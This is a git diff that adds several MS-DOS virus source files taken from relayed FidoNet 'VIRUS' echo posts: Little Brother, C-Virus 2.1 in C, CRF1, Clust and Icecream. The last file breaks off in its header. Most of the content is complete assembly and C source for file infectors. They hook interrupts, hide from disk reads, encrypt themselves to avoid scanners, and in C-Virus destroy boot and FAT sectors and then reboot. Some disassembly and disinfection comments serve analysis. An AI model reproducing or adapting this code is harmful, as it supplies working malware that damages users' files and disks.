93 09:15 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : LTBRO299.DSM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Alan Jones, 2:283/718 (06 Nov 94 17:40) +;* To : Daniel Hendry +;* Subj : LTBRO299.DSM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Alan.Jones@f718.n283.z2.fidonet.org +;Little Brother - resident companion virus, 299 bytes. + +;This virus stores itself inside DOS's data block, over the root directory +;copy. It hooks int 21h, function 4bh (subfunct. 0, load & exec) and +;creates a function 0deh for self identification. When a file is run, +;it first checks to see if it is a COM or an EXE. If it is an EXE, it +;will create a COM file with the same filename. Otherwise - if it is a +;COM, it will check to see if it is the virus by checking the size of the +;file and seeing if there is an EXE with the same (starting) filename. +;If so, it will change the filename to be run to the EXE host and allow +;DOS to execute it. This virus may cause errors (?) due to the place +;in memory it locates itself. + +;Disassembly by Black Wolf. + +.model tiny +.code + org 100h + +start_virus: + cld + mov ax,0DEDEh ;Installation Check + int 21h + cmp ah,41h + je Exit_Virus ;If there - terminate + + mov ax,44h + mov es,ax + mov di,100h ;Copy virus to 0044:0100 + mov si,di ;Root directory entries? + mov cx,end_virus-start_virus ;This is inside DOS data + rep movsb ;block... may cause errors? + + mov ds,cx ;DS = 0 = Interrupt table + mov si,84h ;0:84h = Int 21h entry in table + + mov di,offset Old21_IP ;Save old Int 21h address + movsw + movsw + + push es + pop ds ;Set DS to new seg... + + mov dx,offset Int21_Handler + mov ax,2521h + int 21h ;Hook Int 21h. + +Exit_Virus: + retn ;Terminate + + +EXE_Mask db 'EXE',0 +COM_Mask db 'COM',0 + +CritErrHandler: + mov al,3 + iret + +Int21_Handler: + pushf + cmp ax,0DEDEh ;Is this an installation + je Install_Check ;check call? + + push dx bx ax ds es ;Save regs.... + + cmp ax,4B00h ;Is it load and execute? + jne Exit_21h ;No... exit handler + call Infect_File ;Yes... infect file + +Exit_21h: + pop es ds ax bx dx + popf + jmp dword ptr cs:[Old21_IP] ;Jump to Old Int 21h + +Install_Check: + mov ax,4101h + popf + iret + +Infect_File: + cld + mov word ptr cs:[Filename_off],dx ;Save filename offset + mov word ptr cs:[Filename_seg],ds ;and segment. + push cs + pop ds + mov dx,offset VirusDTA + mov ah,1Ah + int 21h ;Set DTA to us... + + call Find_Extension + + mov si,offset ds:[EXE_Mask] + mov cx,3 + repe cmpsb ;Is it an EXE file? + jnz Not_EXE + + mov si,offset COM_Mask + call Change_Ext ;Change extension to COM + + mov ax,3300h + int 21h ;Get Ctrl-Break Status + push dx ;Save it.... + + xor dl,dl + mov ax,3301h + int 21h ;Disable Ctrl-Break. + + mov ax,3524h + int 21h ;Get Int 24h handler's address + + push bx + push es ;Save it for later... + + push cs + pop ds ;DS = virus segment + + mov dx,offset CritErrHandler + mov ax,2524h + int 21h ;Set Critical Error handler. + + + lds dx,dword ptr ds:[Filename_Off] ;DS:DX = filename + xor cx,cx ;Reg attributes + mov ah,5Bh + int 21h ;Create File.. + jc Done_Infect + + xchg ax,bx + push cs + pop ds + + mov cx,end_virus-start_virus + mov dx,100h + mov ah,40h + int 21h ;Write entire virus + + cmp ax,cx ;did it all write? + + pushf + mov ah,3Eh ;Close file. + int 21h + popf + + jz Done_Infect ;Yes, go Done_Infect + + lds dx,dword ptr ds:[Filename_Off] + mov ah,41h + int 21h ;Delete file, incomplete + ;write or write error. + +Done_Infect: + pop ds + pop dx + mov ax,2524h + int 21h ;Restore Critical error handler + + pop dx ;Get old CTRL-Break handler + mov ax,3301h ;status and restore it. + int 21h + + mov si,offset EXE_Mask + call Change_Ext ;Change extension back to orig. + +Leave_Infect: + retn + +Not_EXE: + call Locate_File + cmp word ptr cs:[24dh], end_virus-start_virus + jne Leave_Infect ;Is the file size right for Virus? + + mov si,offset EXE_Mask ;If so, is there an EXE of the same + call Change_Ext ;name as the COM file? + call Locate_File + jnc Leave_Infect ;If not exit, otherwise - is already + mov si,offset COM_Mask ;infected, so change extension + jmp short Change_Ext ;to run uninfected program. + + +Locate_File: + lds dx,dword ptr ds:[Filename_Off] + mov cl,27h + mov ah,4Eh + int 21h ;Find First Filename match. + retn + + +Change_Ext: + call Find_Extension + push cs + pop ds + movsw + movsw + retn + +Find_Extension: + les di,dword ptr cs:[Filename_Off] + mov ch,0FFh + mov al,2Eh ;Scan through filename until a '.' + repne scasb + retn + +Virus_Name db 'Little Brother',0 + +end_virus: + +Old21_IP dw ? +Old21_CS dw ? + +Filename_Off dw ? +Filename_Seg dw ? + +VirusDTA: +end start_virus + +;-+- FMail 0.96 +; + Origin: **SERMEDITECH BBS** Soissons FR (+33) 23.73.02.51 (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/v Include full symbolic debug information +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir48.c b/MSDOS/Virus.MSDOS.Unknown.vir48.c new file mode 100644 index 00000000..273c5820 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir48.c @@ -0,0 +1,255 @@ +/* PVT.VIRII (2:465/65.4) PVT.VIRII + Msg : 38 of 54 + From : MeteO 2:5030/136 Tue 09 Nov 93 09:15 + To : - *.* - Fri 11 Nov 94 08:10 + Subj : CVIRUS21.C + +.RealName: Max Ivanov + +* Kicked-up by MeteO (2:5030/136) +* Area : VIRUS (Int: p p) +* From : Clif Jessop, 2:283/718 (06 Nov 94 17:40) +* To : Mike Salvino +* Subj : CVIRUS21.C + +@RFC-Path: +ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +18.n283!not-for-mail +@RFC-Return-Receipt-To: Clif.Jessop@f718.n283.z2.fidonet.org + C-Virus: A generic .COM and .EXE infector + Written by Nowhere Man + October 2, 1991 + Version 2.1 + */ + +#include +#include +#include +#include +#include + + + /* Note that the #define TOO_SMALL is the minimum size of the .EXE or .COM + file which CVIRUS can infect without increasing the size of the + file. (Since this would tip off the victim to CVIRUS's presence, no + file under this size will be infected.) It should be set to the + approximate size of the LZEXEd .EXE file produced from this code, but + always a few bytes larger. Why? Because this way CVIRUS doesn't need + to check itself for previous infection, saving time. + + SIGNATURE is the four-byte signature that CVIRUS checks for to prevent + re-infection of itself. + */ + +#ifdef DEBUG +#define TOO_SMALL 6000 +#else +#define TOO_SMALL 4735 +#endif + +#define SIGNATURE "NMAN" + + /* The following is a table of random byte values. Be sure to constantly + change this to prevent detection by virus scanners, but keep it short + (or non-exsistant) to keep the code size down. + */ + + char screw_virex[] = "\xF5\x23\x72\x96\x54\xFA\xE3\xBC\xCD\x04"; + +void hostile_activity(void) +{ + /* Put whatever you feel like doing here... + I chose to make this routine trash the victim's boot, FAT, + and directory sectors, but you can alter this code however you want, + and are encouraged to do so. + */ + + +#ifdef DEBUG + puts("\aAll files infected!"); + exit(1); +#else + + /* Overwrite five sectors, starting with sector 0, on C:, with the + memory at location DS:0000 (random garbage). + */ + + abswrite(2,5,0,(void *) 0); + __emit__(0xCD, 0x19); // Reboot computer + +#endif + +} + +int infected(char *fname) +{ + /* This function determines if fname is infected. It reads four + bytes 28 bytes in from the start and checks them agains + the current header. 1 is returned if the file is already infected, + 0 if it isn't. + */ + + register int handle; + char virus_signature[35]; + static char check[] = SIGNATURE; + + handle = _open(fname, O_RDONLY); + _read(handle, virus_signature, + sizeof(virus_signature)); + close(handle); + +#ifdef DEBUG + printf("Signature for %s: %.4s\n", fname, &virus_signature[28]); +#endif + + /* This next bit may look really stupid, but it actually saves about + 100 bytes. + */ + + return((virus_signature[30] == check[2]) && (virus_signature[31] == +check[3])); +} + +void spread(char *virus, struct ffblk *victim) +{ + /* This function infects victim with virus. First, the victim's + attributes are set to 0. Then the virus is copied into the victim's + file name. Its attributes, file date/time, and size are set to that + of the victim's, preventing detection, and the files are closed. + */ + + register int virus_handle, victim_handle; + unsigned virus_size; + char virus_code[TOO_SMALL + 1], *victim_name; + + /* This is used enought to warrant saving it in a separate variable */ + + victim_name = victim->ff_name; + + +#ifdef DEBUG + printf("Infecting %s with %s...\n", victim_name, virus); +#endif + + /* Turn off all of the victim's attributes so it can be replaced */ + + _chmod(victim_name, 1, 0); + + +#ifdef DEBUG + puts("Ok so far..."); +#endif + + + /* Recreate the victim */ + + virus_handle = _open(virus, O_RDONLY); + victim_handle = _creat(victim_name, victim->ff_attrib); + + + /* Copy virus */ + + virus_size = _read(virus_handle, virus_code, sizeof(virus_code)); + _write(victim_handle, virus_code, virus_size); + +#ifdef DEBUG + puts("Almost done..."); +#endif + + /* Reset victim's file date, time, and size */ + + chsize(victim_handle, victim->ff_fsize); + setftime(victim_handle, (struct ftime *) &victim->ff_ftime); + + + /* Close files */ + + close(virus_handle); + close(victim_handle); + +#ifdef DEBUG + puts("Infection complete!"); +#endif +} + +struct ffblk *victim(void) +{ + /* This function returns a pointer to the name of the virus's next + victim. This routine is set up to try to infect .EXE and .COM + files. If there is a command line argument, it will try to + infect that file instead. If all files are infected, hostile + activity is initiated... + */ + + register char **ext; + static char *types[] = {"*.EXE", "*.COM", NULL}; + static struct ffblk ffblk; + int done; + + for (ext = (*++_argv) ? _argv : types; *ext; ext++) + { + for (ext = (*++_argv) ? _argv : types; *ext; ext++) + { + done = findfirst(*ext, &ffblk, FA_RDONLY | FA_HIDDEN | FA_SYSTEM | +FA_ARCH); + while (!done) { +#ifdef DEBUG + printf("Scanning %s...\n", ffblk.ff_name); +#endif + + /* If you want to check for specific days of the week, months, + etc.... here is the place to insert the code (don't forget to + "#include "). + */ + + if ((ffblk.ff_fsize > TOO_SMALL) && (!infected(ffblk.ff_name))) + return(&ffblk); + + done = findnext(&ffblk); + } + } + } + /* If there are no files left to infect, have a little fun */ + + hostile_activity(); + return(0); +} + +int main(int argc, char *argv[]) +{ + /* In the main program, a victim is found and infected. If all files + are infected, a malicious action is performed. Otherwise, a bogus + error message is displayed, and the virus terminates with code + 1, simulating an error. + */ + + char *err_msg[] = { "Out of memory", + "Bad EXE format", + "Invalid DOS version", + "Bad memory block", + "FCB creation error", + "Sharing violation", + "Abnormal program termination", + "Divide error", + }; + + char *virus_name; + spread(argv[0], victim()); + puts(err_msg[peek(0, 0x46C) % (sizeof(err_msg) / sizeof(char *))]); + return(1); +} + +/*-+- GEcho 1.00 + + Origin: Stop creating them! Virusses aren't great! (2:283/718) +============================================================================= + +Yoo-hooo-oo, -! + + + The MeeO + +/d Warn if duplicate symbols in libraries + +--- Aidstest Null: /Kill + * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136)*/ + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir49.asm b/MSDOS/Virus.MSDOS.Unknown.vir49.asm new file mode 100644 index 00000000..7b13e0c4 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir49.asm @@ -0,0 +1,224 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 39 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : CRF.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Fred Lee, 2:283/718 (06 Nov 94 17:46) +;* To : Mike Nisbett +;* Subj : CRF.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Fred.Lee@f718.n283.z2.fidonet.org + title "CRF1 virus. Born on the Fourth of July. Written by TBSI." + page 60,80 +code segment word public 'code' + assume cs:code,ds:code + org 100h +main proc;edure + + +; As referenced in this source listing, Top-Of-File represents location 100h in +; the current memory segment, which is where the virus code is loaded into mem. +; The word "program" refers to the infected programs code and "virus" refers to +; the virus's code. This information is included to clarify my use of the word +; "program" in the remarks throughout this listing. + +; Since the virus (with the exception of "call skip" and "db 26") can be loaded +; anywhere in memory depending on the length of the infected program, I made it +; to where the BP register would be loaded with the displacement of the code in +; memory. This was done as follows: +; 1) a CALL instruction was issued. It places the TRUE return +; address onto the stack. +; 2) instead of returning to there, the value was popped off of +; the stack into the BP register +; 3) then, it subtracts the EXPECTED value of BP (the address of +; EOFMARK in the 1st-time copy) from BP to get the offset. +; 4) all references to memory locations were thereafter changed +; to refernces to EXPECTED memory locations + BP +; This fixed the problem. + + + + +tof: ;Top-Of-File + jmp short begin ;Skip over program + nop ;Reserve 3rd byte +EOFMARK: db 26 ;Disable DOS's TYPE + +first_four: nop ;First run copy only! +address: int 20h ;First run copy only! +check: nop ;First run copy only! + +begin: call nextline ;Push BP onto stack +nextline: pop bp ;BP=location of Skip + sub bp,offset nextline ;BP=offset from 1st run + + mov byte ptr [bp+offset infected],0 ;Reset infection count + + lea si,[bp+offset first_four] ;Original first 4 bytes + mov di,offset tof ;TOF never changes + mov cx,4 ;Lets copy 4 bytes + cld ;Read left-to-right + rep movsb ;Copy the 4 bytes + + mov ah,1Ah ;Set DTA address ... + lea dx,[bp+offset DTA] ; ... to *our* DTA + int 21h ;Call DOS to set DTA + + mov ah,4Eh ;Find First ASCIIZ + lea dx,[bp+offset filespec] ;DS:DX -} '*.COM',0 + lea si,[bp+offset filename] ;Point to file + push dx ;Save DX + jmp short continue ;Continue... + +return: mov ah,1ah ;Set DTA address ... + mov dx,80h ; ... to default DTA + int 21h ;Call DOS to set DTA + xor ax,ax ;AX= 0 + mov bx,ax ;BX= 0 + mov cx,ax ;CX= 0 + mov dx,ax ;DX= 0 + mov si,ax ;SI= 0 + mov di,ax ;DI= 0 + mov sp,0FFFEh ;SP= 0 + mov bp,100h ;BP= 100h (RETurn addr) + push bp ; Put on stack + mov bp,ax ;BP= 0 + ret ;JMP to 100h + +nextfile: or bx,bx ;Did we open the file? + jz skipclose ;No, so don't close it + mov ah,3Eh ;Close file + int 21h ;Call DOS to close it + xor bx,bx ;Set BX back to 0 +skipclose: mov ah,4Fh ;Find Next ASCIIZ + +continue: pop dx ;Restore DX + push dx ;Re-save DX + xor cx,cx ;CX= 0 + xor bx,bx + int 21h ;Find First/Next + jnc skipjmp + jmp NoneLeft ;Out of files + +skipjmp: mov ax,3D02h ;open file + mov dx,si ;point to filespec + int 21h ;Call DOS to open file + jc nextfile ;Next file if error + + mov bx,ax ;get the handle + mov ah,3Fh ;Read from file + mov cx,4 ;Read 4 bytes + lea dx,[bp+offset first_four] ;Read in the first 4 + int 21h ;Call DOS to read + + cmp byte ptr [bp+offset check],26 ;Already infected? + je nextfile ;Yep, try again ... + cmp byte ptr [bp+offset first_four],77 ;Mis-named .EXE? + je nextfile ;Yep, maybe next time! + + mov ax,4202h ;LSeek to EOF + xor cx,cx ;CX= 0 + xor dx,dx ;DX= 0 + int 21h ;Call DOS to LSeek + + cmp ax,0FD00h ;Longer than 63K? + ja nextfile ;Yep, try again... + mov [bp+offset addr],ax ;Save call location + + mov ah,40h ;Write to file + mov cx,4 ;Write 4 bytes + lea dx,[bp+offset first_four] ;Point to buffer + int 21h ;Save the first 4 bytes + + mov ah,40h ;Write to file + mov cx,offset eof-offset begin ;Length of target code + lea dx,[bp+offset begin] ;Point to virus start + int 21h ;Append the virus + + mov ax,4200h ;LSeek to TOF + xor cx,cx ;CX= 0 + xor dx,dx ;DX= 0 + int 21h ;Call DOS to LSeek + + mov ax,[bp+offset addr] ;Retrieve location + inc ax ;Adjust location + + mov [bp+offset address],ax ;address to call + mov byte ptr [bp+offset first_four],0E9h ;JMP rel16 inst. + mov byte ptr [bp+offset check],26 ;EOFMARK + + mov ah,40h ;Write to file + mov cx,4 ;Write 4 bytes + lea dx,[bp+offset first_four] ;4 bytes are at [DX] + int 21h ;Write to file + + inc byte ptr [bp+offset infected] ;increment counter + jmp nextfile ;Any more? + +NoneLeft: cmp byte ptr [bp+offset infected],2 ;At least 2 infected? + jae TheEnd ;The party's over! + + mov di,100h ;DI= 100h + cmp word ptr [di],20CDh ;an INT 20h? + je TheEnd ;Don't go to prev. dir. + + lea dx,[bp+offset prevdir] ;'..' + mov ah,3Bh ;Set current directory + int 21h ;CHDIR .. + jc TheEnd ;We're through! + mov ah,4Eh + jmp continue ;Start over in new dir + +TheEnd: jmp return ;The party's over! + +filespec: db '*.COM',0 ;File specification +prevdir: db '..',0 ;previous directory + +; None of this information is included in the virus's code. It is only used +; during the search/infect routines and it is not necessary to preserve it +; in between calls to them. + +eof: +DTA: db 21 dup (?) ;internal search's data + +attribute db ? ;attribute +file_time db 2 dup (?) ;file's time stamp +file_date db 2 dup (?) ;file's date stamp +file_size db 4 dup (?) ;file's size +filename db 13 dup (?) ;filename + +infected db ? ;infection count + +addr dw ? ;Address + + main endp;rocedure + code ends;egment + + end main +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + +;-+- GEcho 1.00 +; + Origin: Poeldijk, The Netherlands, Europe, Earth (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;Options: /m = map file with publics +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir50.asm b/MSDOS/Virus.MSDOS.Unknown.vir50.asm new file mode 100644 index 00000000..dcd4466c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir50.asm @@ -0,0 +1,252 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 40 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : CLUST.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Mike Salvino, 2:283/718 (06 Nov 94 17:48) +;* To : Daniel Hendry +;* Subj : CLUST.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Mike.Salvino@f718.n283.z2.fidonet.org +;Clust Virus from TridenT research group - small but fairly interesting, +;it's one of the more advanced from TridenT that I've seen with the +;possible exception of the TPE. + +;This virus goes memory resident at the top of lower memory and hooks +;Int 13h. Whenever an EXE file header is written, it checks to see +;if there is a large field of 0's inside it (VERY common in EXE's) +;and, if so, will put itself inside it and change the exe marker bytes +;'MZ' to a jump to that code. In this way, it effectively converts the +;file to a COM file when it is run. After this it re-executes the EXE +;file. Because of a stealth handler on Int 13h function 2 (absolute +;disk read) the EXE file is read as it originally was (the handler +;zero's out the field in which it resides and restores the jump to +;'MZ'). Because of the way this virus works, it can only infect +;smaller EXE files. + +;NOTE: +;Several commands are commented out and have the actual bytes entered +;next to them instead. This is because the compiler that Clust was +;originally compiled on used different translations than mine, and +;I wished to preserve the EXACT virus code. + +;Disinfection: Because of this virus' stealth routine, disinfection should +; be possible simply by Zipping or Arjing all EXE files on an +; infected disk, then rebooting from a clean disk and unarchiving +; the files. The original archiving MUST be done while the +; virus is active in memory. Also - after rebooting - make +; sure the program you use to unarchive the files is _NOT_ +; infected. + +;Disassembly by Black Wolf + +.model tiny +.code + org 100h + +start: + jmp short EntryPoint + +LotsaNOPs db 122 dup (90h) ;Usually will be EXE header.... + +OldInt13 dd 0 + +EntryPoint: + db 0e9h,7ch,0 ;jmp InstallVirus + +Int13Handler: + cmp ah,3 + je IsDiskWrite + + cmp ah,2 + jne GoInt13 + + pushf + call cs:OldInt13 ;Call Int 13h + + jc Exit13Handler ;Exit on error. + + cmp word ptr es:[bx],7EEBh ;Is sector infected? + jne Exit13Handler + + mov word ptr es:[bx],5A4Dh ;Cover mark with 'MZ' + + push di cx ax ;Stealth routine..... + mov cx,115h + xor ax,ax + db 89h,0dfh ;mov di,bx + + ;Zero out virus from + add di,80h ;sector when it is read. + rep stosb + pop ax cx di + +Exit13Handler: + iret +GoInt13: + jmp cs:[OldInt13] +IsDiskWrite: + cmp word ptr es:[bx],5A4Dh ;Is EXE file being written? + jne GoInt13 + + cmp word ptr es:[bx+4],75h ;Is file too large? + jae GoInt13 + + push ax cx si di ds + push es + pop ds + db 89h,0deh ;mov si,bx + + add si,80h ;Look in EXE header.... + mov cx,115h +AllZeros: + lodsb + cmp al,0 + loopz AllZeros + + cmp cx,0 ;Check to see if entire field + jne ExitInfectHandler ;was zeroed - leave if not. + + + db 89h,0dfh ;mov di,bx + add di,80h + mov cx,115h + mov si,offset OldInt13 + push cs + pop ds + rep movsb + + db 89h,0dfh ;mov di,bx + + ;Copy virus + ;over zero area in EXE header. + mov ax,7EEBh ;Stick in Jump over 'MZ' + stosw + +ExitInfectHandler: + pop ds di si cx ax ;Allow Write to process now. + jmp short GoInt13 + +InstallVirus: + mov ax,3513h + int 21h ;Get Int 13 addres + mov word ptr cs:[OldInt13],bx + mov word ptr cs:[OldInt13+2],es + + mov ah,0Dh + int 21h ;Flush disk buffers + + mov ah,36h + mov dl,0 + int 21h ;Get free space on default drive + + mov ax,cs + dec ax + mov ds,ax + cmp byte ptr ds:0,'Z' ;Are we the last chain? + jne Terminate ;If not, terminate. + + ;sub word ptr ds:[3],39h ;subtract from MCB size + db 81h,2eh,03,0,39h,0 + + ;sub word ptr ds:[12h],39h ;subtract from PSP TopOfMem + db 81h,2eh,12h,0,39h,0 + + mov si,offset OldInt13 + + db 89h,0f7h ;mov di,si + + mov es,ds:[12h] ;ES = new segment + push cs + pop ds + mov cx,115h ;Copy virus into memory + rep movsb + + mov ax,2513h + push es + pop ds + mov dx,offset Int13Handler + int 21h ;Set int 13 to virus handler + + mov ah,4Ah + push cs + pop es + mov bx,39h + int 21h ;Modify mem alloc. + + push cs + pop ds + mov bx,ds:[2ch] ;Get environment segment + mov es,bx + xor ax,ax + mov di,1 + +ScanForFilename: ;Find name of file executed + dec di ;in environment strings... + scasw ;(located after two 0's) + jnz ScanForFilename + + lea si,[di+2] + push bx + pop ds ;DS = environment segment + + push cs + pop es ;ES = code segment + + mov di,offset Filename + push di + xor bx,bx + +CopyFilename: + mov cx,50h + inc bx + lodsb + cmp al,0 + jne StoreFilename ;Change zero at end of + mov al,0Dh ;filename to a return + +StoreFilename: + stosb + cmp al,0Dh ;If it was a return, we're + loopnz CopyFilename ;done copying the filename + + mov byte ptr ds:[28fh],bl + push cs + pop ds + pop si + dec si + int 2Eh ;Re-execute EXE file with + ;Stealth handler in memory, + ;so Exe is run w/o virus. + +Terminate: + mov ah,4Ch + int 21h + + db 0 +Filename db 1 + +end start + +;-+- Terminate 1.50/Pro +; + Origin: Fred's Place (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/zi,/zd,/zn Debug info: zi=full, zd=line numbers only, zn=none +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir51.asm b/MSDOS/Virus.MSDOS.Unknown.vir51.asm new file mode 100644 index 00000000..a92d4fd1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir51.asm @@ -0,0 +1,292 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 41 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : ICECREAM.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Dr T , 2:283/718 (06 Nov 94 17:48) +;* To : Ron Toler +;* Subj : ICECREAM.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Dr.T.@f718.n283.z2.fidonet.org +;Icecream Virus by the TridenT virus research group. + +;This is a simple direct-action com virus that uses one of +;4 encryption algorithms to encrypt itself each time it infects a file. +;It will infect one .COM file in the current directory every time it is +;executed. It marks infections with the time stamp. + + +;Disassembly by Black Wolf + +.model tiny +.code + org 100h + +start: + db 0e9h,0ch,0 ;jmp Virus_Entry + +Author_Name db 'John Tardy' + + db 0E2h,0FAh +Virus_Entry: + push ax + call Get_Offset +Get_Offset: + pop ax + sub ax,offset Get_Offset + + db 89h,0c5h ;mov bp,ax + lea si,[bp+Storage] + mov di,100h ;Restore file + movsw + movsb + + mov ah,1Ah + mov dx,0f900h + int 21h ;Set DTA + + mov ah,4Eh + +FindFirstNext: + lea dx,[bp+ComMask] + xor cx,cx + int 21h ;Find File + jnc InfectFile + +Restore_DTA: + mov ah,1Ah + mov dx,80h + int 21h ;Set DTA to default + + mov bx,offset start + pop ax ;Return to host + push bx + retn + +InfectFile: + mov ax,4300h + mov dx,0f91eh + int 21h ;Get file attribs + + push cx ;save 'em + mov ax,4301h + xor cx,cx + int 21h ;Set them to 0 + + mov ax,3D02h + int 21h ;Open file + + mov bx,5700h + xchg ax,bx + int 21h ;Get file time + + push cx + push dx ;save it + and cx,1Fh + cmp cx,1 ;check for infection + jne ContinueInfection + db 0e9h,69h,0 ;jmp DoneInfect + +ContinueInfection: + mov ah,3Fh + lea dx,[bp+Storage] + mov cx,3 + int 21h ;Read in first 3 bytes + + mov ax,cs:[Storage+bp] + cmp ax,4D5Ah ;Is it an EXE? + je DoneInfect + cmp ax,5A4Dh + je DoneInfect ;Other EXE signature? + + pop dx + pop cx + and cx,0FFE0h ;Change stored time values + or cx,1 ;to mark infection + push cx + push dx + + mov ax,4202h ;Go to the end of the file + call Move_FP + sub ax,3 + mov cs:[JumpSize+bp],ax ;Save jump size + + add ax,10Fh ;Save encryption starting + mov word ptr [bp+EncPtr1+1],ax ;point.... + mov word ptr [bp+EncPtr2+1],ax + mov word ptr [bp+EncPtr3+1],ax + mov word ptr [bp+EncPtr4+1],ax + call SetupEncryption ;Encrypt virus + + mov ah,40h + mov dx,0fa00h + mov cx,1F5h + int 21h ;Write virus to file + + mov ax,4200h + call Move_FP ;Go to the beginning of file + + mov ah,40h + lea dx,[bp+JumpBytes] + mov cx,3 + int 21h ;Write in jump + + call FinishFile + jmp Restore_DTA + +DoneInfect: + call FinishFile + mov ah,4Fh + jmp FindFirstNext + +Move_FP: + xor cx,cx + xor dx,dx + int 21h + ret + +FinishFile: + pop si dx cx + mov ax,5701h ;Reset file time/date stamp + int 21h ;(or mark infection) + + mov ah,3Eh + int 21h ;Close new host file + + mov ax,4301h + pop cx + mov dx,0fc1eh + int 21h ;Restore old attributes + + push si + retn + +Message db ' I scream, you scream, we both ' + db 'scream for an ice-cream! ' + +SetupEncryption: + xor byte ptr [bp+10Dh],2 + xor ax,ax + mov es,ax + mov ax,es:[46ch] ;Get random number + push cs + pop es + push ax + and ax,7FFh + add ax,1E9h + mov word ptr [bp+EncSize1+1],ax + mov word ptr [bp+EncSize2+1],ax + mov word ptr [bp+EncSize3+1],ax + mov word ptr [bp+EncSize4+1],ax + pop ax + push ax + and ax,3 + shl ax,1 + mov si,ax + mov ax,[bp+si+EncData1] + add ax,bp + mov si,ax + lea di,[bp+103h] + movsw + movsw + movsw + movsw ;Copy Encryption Algorithm + pop ax + stosb + movsb + mov dl,al + lea si,[bp+103h] + mov di,0fa00h + mov cx,0Ch + rep movsb + lea si,[bp+10Fh] + mov cx,1E9h + +EncryptVirus: + lodsb + db 30h,0d0h ;xor al,dl + stosb + loop EncryptVirus + + cmp dl,0 + je KeyWasZero + retn + +KeyWasZero: ;If key is zero, increase + mov si,offset AuthorName ;jump size and place name + mov di,0fa00h ;at beginning.... + mov cx,0Ah + rep movsb + mov ax,cs:[JumpSize+bp] + add ax,0Ch + mov cs:[JumpSize+bp],ax + retn + + db '[TridenT]' + +EncData1 dw 02beh +EncData2 dw 02c7h +EncData3 dw 02d0h +EncData4 dw 02d9h + +Encryptions: +;------------------------------------------------------------ +EncPtr1: + mov si,0 +EncSize1: + mov cx,0 + xor byte ptr [si],46h +;------------------------------------------------------------ +EncPtr2: + mov di,0 +EncSize2: + mov cx,0 + xor byte ptr [di],47h +;------------------------------------------------------------ +EncSize3: + mov cx,0 +EncPtr3: + mov si,0 + xor byte ptr [si],46h +;------------------------------------------------------------ +EncSize4: + mov cx,0 +EncPtr4: + mov di,0 + xor byte ptr [di],47h +;------------------------------------------------------------ + +AuthorName db 'John Tardy' + +JumpBytes db 0E9h +JumpSize dw 0 + +ComMask db '*.CoM',0 + +Storage dw 20CDh + db 21h + +end start + +;-+- GEcho 1.10+ +; + Origin: This virus is Microsoft Windows (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/x Include false conditionals in listing +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir52.asm b/MSDOS/Virus.MSDOS.Unknown.vir52.asm new file mode 100644 index 00000000..ebeb4946 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir52.asm @@ -0,0 +1,306 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 42 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : V_VHP353.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) 